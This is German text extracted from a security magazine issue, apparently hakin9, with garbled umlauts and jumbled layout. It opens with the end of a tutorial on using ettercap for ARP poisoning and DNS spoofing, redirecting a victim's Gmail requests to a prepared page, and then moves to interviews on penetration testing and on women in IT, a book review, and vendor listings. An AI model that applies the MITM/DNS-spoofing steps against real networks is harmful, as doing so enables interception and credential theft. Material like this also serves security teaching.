entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
Penetration Testing im Jahre 2010
hakin9orgde 17
Im Jahr 2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Firewall-Hardware gibt es mittlerweile zu erschwinglichen Preisen IT-System-
haumluser holen sich Sicherheitsexperten und richten mit deren Unterstuumltzung ein sicheres Netzwerk ein Mitar-beiter werden im Umgang mit der IT-Technik geschult sodass Phishing und Social Engineering Angriffe erfolg-los verlaufen IDS und IPS Systeme finden verdaumlchtige Aktivitaumlten im Netzwerk und zeigen diese dem Adminis-trator an Die IEEE 8021X Authentifizierung an Access Points und Netzwerkswitches verhindern den Zugang von unbekannten Computern zum Netzwerk Mit IEEE 8021Q (Virtual Local Area Network oder kurz VLAN) werden Netzwerke segmentiert obwohl alle Compu-ter hardwareseitig an einem Switch haumlngen Mit diesen Techniken ist man in der Lage ein Netzwerk sowohl vor Angriffen aus dem WAN als auch aus dem Inneren LAN zu schuumltzen ndash wuumlrde man meinen
